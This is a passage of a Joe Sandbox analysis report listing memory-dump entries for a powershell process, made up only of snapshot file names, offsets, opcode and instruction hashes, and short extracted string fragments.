              • Snapshot File: hcaresult_8_2_3e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5b917c0b7b1bc6df151c10c184420a6443fa14e34337d9c43c461357f2e4a601
              • Instruction ID: 6b0746acc57e923e3dee185e5022db83018a1f0d992496e1391e6648bb393367
              • Opcode Fuzzy Hash: 5b917c0b7b1bc6df151c10c184420a6443fa14e34337d9c43c461357f2e4a601
              • Instruction Fuzzy Hash: 5E419235B006608FDB1AEB65D8887BB33AAAB84318F154675E90A9F3E5DF349C45C780
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a8c4d93e5ee1b8d5703dd07e52b7718b96c066021b7db1cf9f862c7593ebcf54
              • Instruction ID: 4136242b6eafb775b496531aa4d0dd07b834679bafb7341237d470b84740288b
              • Opcode Fuzzy Hash: a8c4d93e5ee1b8d5703dd07e52b7718b96c066021b7db1cf9f862c7593ebcf54
              • Instruction Fuzzy Hash: 2D312930A04206DFDB24CF49D548BAABBFABF94305F14C06AE9548A1A0C376DC94DB81
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b2441550f32858344972fa5a74ce93d6d64e84804443dfc5f446cabc76b5e3c
              • Instruction ID: f6df9fc6ffd0f5a33edc37ef7ac7a0d327fb403e77d6eec01d9ea14e2ca5f404
              • Opcode Fuzzy Hash: 1b2441550f32858344972fa5a74ce93d6d64e84804443dfc5f446cabc76b5e3c
              • Instruction Fuzzy Hash: 8921E5B0B04205CFCB24DF5CD5806AABBBAAFD5310F198166EA249F285D735DC44CB91
              Memory Dump Source
              • Source File: 00000008.00000002.380029978.000000000036D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0036D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_36d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ae3db7379bc6f274a4dd5420e813aece4181baef2d645371c1984fffd9bb60a4
              • Instruction ID: 24b78e19df67a1252653dd62ad4728272e29ec513a368720bb0add8bcb422b7e
              • Opcode Fuzzy Hash: ae3db7379bc6f274a4dd5420e813aece4181baef2d645371c1984fffd9bb60a4
              • Instruction Fuzzy Hash: CF01A771A04380AAE7224E19D8C4B66BFDCEF41724F18C41AED454B68AC679D845C6B1
              Memory Dump Source
              • Source File: 00000008.00000002.380029978.000000000036D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0036D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_36d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 06b8287bcd8017361eab27c1cc054267c828f067a12e28d7c426801d6e4c2088
              • Instruction ID: 0380456325032bda871d001d004ee5c213993de730baa516c004041ad76b784d
              • Opcode Fuzzy Hash: 06b8287bcd8017361eab27c1cc054267c828f067a12e28d7c426801d6e4c2088
              • Instruction Fuzzy Hash: 89F06271904344AEEB218E1ADCC8B66FFD8EB41724F18C55AED484F28AC2799C44CAB1
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$$p$$p
              • API String ID: 0-1154554433
              • Opcode ID: 7a1967d0f4992159d1448e8c8914e39cd66bdfaf4e31d4e7d79e62cfed4d797b
              • Instruction ID: de1612cba6e25bb6b41980a831601255dc0a851a76bab4faa91ffa00c7501da0
              • Opcode Fuzzy Hash: 7a1967d0f4992159d1448e8c8914e39cd66bdfaf4e31d4e7d79e62cfed4d797b
              • Instruction Fuzzy Hash: B4E15935B04204DFCB299B68D850B7E7BB6EFC0300F18886AE9559B2D2DB70DD45CB92
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'p$4'p$4'p$4'p$tPp$tPp$tPp$tPp
              • API String ID: 0-3987087365
              • Opcode ID: a4805bd2db0f006fb14ce4dff4bfc00c88b893b85470b34da444638ba480c5f8
              • Instruction ID: a9d86b35efd0b86f90eb0849a2ae595a951a0ca791a006a5e04005286984ad24
              • Opcode Fuzzy Hash: a4805bd2db0f006fb14ce4dff4bfc00c88b893b85470b34da444638ba480c5f8
              • Instruction Fuzzy Hash: CFF12131B043408FDB258B699850B7ABBF6AFC5311F68C8ABD9458B2C1EB75CD81C791
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $p$$p$$p$$p
              • API String ID: 0-3121760203
              • Opcode ID: 9d73aaa1b63151a06f5b152cad0327f4a5828e837290e3b4be5921b838bd0dde
              • Instruction ID: 2875fa573c116acbac2c0bd754e93e7634289accee2ea8ff3b7b1510748c8fc6
              • Opcode Fuzzy Hash: 9d73aaa1b63151a06f5b152cad0327f4a5828e837290e3b4be5921b838bd0dde
              • Instruction Fuzzy Hash: 1F81F2357042019FDB59CBA8D854A6AFBE6EFC8310B28C46AE9598B385CE31DD42C791
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $p$$p$$p$$p
              • API String ID: 0-3121760203
              • Opcode ID: ef8a59b0e975d1c2a7e87d088b5074d67a8b69e41cadcb9137717fe582e72c53
              • Instruction ID: 32f0be87bd29540c444b876653fba8661b2897ec31eb4212863d6a5b8b4e2e6e
              • Opcode Fuzzy Hash: ef8a59b0e975d1c2a7e87d088b5074d67a8b69e41cadcb9137717fe582e72c53
              • Instruction Fuzzy Hash: B02147B13002105FEB2859699840B7BAA9A9FC4715F68483AEA85CB2C1DE75DC41C361